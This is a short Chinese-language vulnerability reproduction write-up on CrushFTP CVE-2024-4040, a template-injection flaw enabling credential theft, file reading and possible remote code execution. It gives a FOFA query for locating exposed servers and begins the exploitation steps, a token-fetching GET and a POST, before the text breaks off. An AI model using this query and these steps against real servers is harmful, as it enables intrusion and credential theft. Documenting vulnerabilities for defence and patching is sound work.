0x01 产品简介
CrushFTP是一款支持FTP, FTPS, SFTP, HTTP, HTTPS, WebDAV and WebDAV SSL等协议的跨平台FTP服务器软件。
0x02 漏洞概述
CVE-2024-4040 中,攻击者可构造恶意请求利用模版注入获取他人身份凭据,读取文件等,配合相关功能可造成远程代码执行,控制服务器。
0x03 测绘语句
fofa:icon_hash="-1022206565"
0x04 漏洞复现
1、获取token:GET /WebInterface/ HTTP/1.1
2、利用获取的token绕过验证获取敏感信息:POST /WebInterf